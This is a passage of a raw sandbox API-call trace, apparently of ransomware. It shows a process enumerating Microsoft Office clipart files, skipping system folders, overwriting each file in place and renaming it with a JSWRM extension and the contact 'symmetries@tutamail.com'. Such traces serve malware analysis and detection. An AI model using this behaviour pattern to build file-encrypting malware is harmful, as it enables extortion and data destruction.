lpString2="msocache") returned -1 [0078.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02075_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02075_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02075_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0078.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02075_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02075_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02075_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0078.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0078.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.661] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4396) returned 1 [0078.661] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1120) returned 0x205850 [0078.661] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1120, lpOverlapped=0x0) returned 1 [0078.666] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.666] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1120, lpOverlapped=0x0) returned 1 [0078.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.667] CloseHandle (hObject=0x314) returned 1 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0078.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0078.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0078.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0078.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0078.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0078.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0078.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0078.668] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02088_.WMF", cAlternateFileName="")) returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2=".") returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="..") returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="...") returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="windows") returned -1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="recovery") returned -1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="perflogs") returned -1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="documents and settings") returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="system volume information") returned -1 [0078.668] lstrcmpiW (lpString1="FD02088_.WMF", lpString2="msocache") returned -1 [0078.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02088_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02088_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02088_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0078.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02088_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02088_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02088_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0078.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0078.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0078.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.670] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3696) returned 1 [0078.670] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe70) returned 0x23fc98 [0078.670] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe70, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.672] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe70, lpOverlapped=0x0) returned 1 [0078.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.672] CloseHandle (hObject=0x314) returned 1 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0078.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0078.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0078.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.673] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.673] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02097_.WMF", cAlternateFileName="")) returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2=".") returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="..") returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="...") returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="windows") returned -1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="recovery") returned -1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="perflogs") returned -1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="documents and settings") returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="system volume information") returned -1 [0078.674] lstrcmpiW (lpString1="FD02097_.WMF", lpString2="msocache") returned -1 [0078.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02097_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02097_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02097_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0078.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02097_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02097_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02097_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0078.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0078.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.674] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1564) returned 1 [0078.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x610) returned 0x2332c0 [0078.675] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x610, lpOverlapped=0x0) returned 1 [0078.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.683] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x610, lpOverlapped=0x0) returned 1 [0078.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0078.683] CloseHandle (hObject=0x314) returned 1 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0078.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0078.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0078.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0078.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.684] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0078.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0078.684] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf2a4e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf2a4e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02115_.WMF", cAlternateFileName="")) returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2=".") returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="..") returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="...") returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="windows") returned -1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="recovery") returned -1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="perflogs") returned -1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="documents and settings") returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="system volume information") returned -1 [0078.684] lstrcmpiW (lpString1="FD02115_.WMF", lpString2="msocache") returned -1 [0078.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02115_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02115_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02115_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0078.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02115_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02115_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02115_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0078.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0078.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.685] WideCharToMultiByte (in: CodePage=0xfde9, 